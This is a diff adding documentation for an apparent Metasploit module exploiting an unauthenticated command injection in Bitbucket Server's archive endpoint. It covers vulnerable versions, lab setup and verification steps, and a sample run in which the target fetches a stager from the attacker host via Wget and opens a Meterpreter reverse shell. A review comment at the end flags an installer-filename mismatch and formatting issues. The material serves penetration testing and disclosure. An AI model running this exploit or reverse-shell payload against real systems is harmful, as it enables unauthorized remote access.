add documentation
@@ -0,0 +1,118 @@
## Vulnerable Application

Various versions of Bitbucket Server and Data Center are vulnerable to
an unauthenticated command injection vulnerability in multiple API endpoints.

The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
creates an archive of the repository, leveraging the `git-archive` command to do so.
Supplying NULL bytes to the request enables the passing of additional arguments to the
command, ultimately enabling execution of arbitrary commands.

According to the [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html), vulnerable versions of Bitbucket are:

Any version released after version `6.10.17` and before:
* `7.6.17`
* `7.17.10`
* `7.21.4`
* `8.0.3`
* `8.1.3`
* `8.2.2`
* `8.3.1`

Download archives can be found [here](https://www.atlassian.com/software/bitbucket/download-archives).

### Installation Instructions

1. Install Git on the target machine
* sudo apt install -y git
2. Download a vulnerable version of Bitbucket. For example, version `8.2.1` can be found
[here](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-8.2.1-x64.bin)
3. Make sure the resulting bin file is executable and run it
* chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next`
5. Check `Install a Server instance` and click `Next`
6. If the default destination directory looks good, click `Next`
7. Click `Next` if the default Bitbucket data directory looks fine
8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next`
9. Make sure the `Install Bitbucket as a service` box is checked and click `Next`
10. Click `Install` if everything looks correct on the summary screen
11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected
and click `Next`
12. Ensure `Launch Bitbucket <version> in browser` is selected and click `Finish`
13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option
14. If you already have an account, select `I have an account`; otherwise, create a new account
15. 'up and running' should be selected on the next page, so click `Generate License`
16. Confirm that the prompt gives you the correct server, then click `Yes`
17. The license should be entered in the box, so select `Next`
18. Finally, set up an administrator account

*Note*: If an error occurs on the last step, just open a browser and navigate to the setup
page at 127.0.0.1:7990

### Vulnerable Setup

1. Log into Bitbucket with your administrator credentials
2. Once logged in, select `Projects` at the top menu
3. Select `Create project`
4. Enter a name for the project and click `Create project`
5. On the next page, select `Create repository`
6. Enter a name for the repository and select `Create repository`
7. Follow the instructions to clone the repository and push data to the repository so it is not empty
8. Click the gear on the left side of the next page
9. Select `Repository permissions` under `Security` on the left
10. Underneath `Public access`, check `Enable` to make the repository public

Bitbucket should now be exploitable

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/bitbucket_git_cmd_injection`
4. Do: `run`
5. You should get a shell.

## Options

### USERNAME

An optional username to authenticate to Bitbucket with

### PASSWORD

An optional password to authenticate to Bitbucket with

### Bitbucket version 8.2.1 on Ubuntu 22.04

```
msf6 > use exploit/linux/http/bitbucket_git_cmd_injection
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set rhost 192.168.140.216
rhost => 192.168.140.216
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'repo_name' in project 'TEST'!
[*] Using URL: http://192.168.140.1:8080/7SGXRWRlXr8t
[*] Client 192.168.140.216 (Wget/1.21.2) requested /7SGXRWRlXr8t
[*] Sending payload to 192.168.140.216 (Wget/1.21.2)
[*] Sending stage (3020772 bytes) to 192.168.140.216
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.216:57994) at 2022-09-20 18:40:27 -0500
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer : 192.168.140.216
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
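Review bot: The installer file name in Installation Instructions step 3 (`atlassian-bitbucket-8.3.0-x64.bin`) does not match the version the step 2 link downloads (`atlassian-bitbucket-8.2.1-x64.bin`); a reader following the steps literally will get a "no such file" error, so make the two agree (the session heading later on the page also says 8.2.1). The shell commands under steps 1 and 3 (`sudo apt install -y git`, `chmod +x ... && sudo ./...`) are bare sub-bullets; wrap them in backticks or a fenced block and indent them under their numbered step so the list renders correctly instead of restarting the numbering. The "### Bitbucket version 8.2.1 on Ubuntu 22.04" session transcript is nested under "## Options", where it reads as a third option; the module documentation template puts such a run under a separate "## Scenarios" heading, so add that heading before it. The "Vulnerable Application" section says "multiple API endpoints" but only documents the `archive` endpoint; either name the others from the advisory or narrow the sentence to the endpoint the module actually uses, and consider citing the advisory's CVE identifier next to the link so the doc is searchable by it. Minor: "Bitbucket should now be exploitable" and the two option descriptions are missing terminal periods, and the USERNAME/PASSWORD descriptions should say what the module does differently when they are set, since the sample run shows the module searching for a publicly accessible repository when no credentials are given.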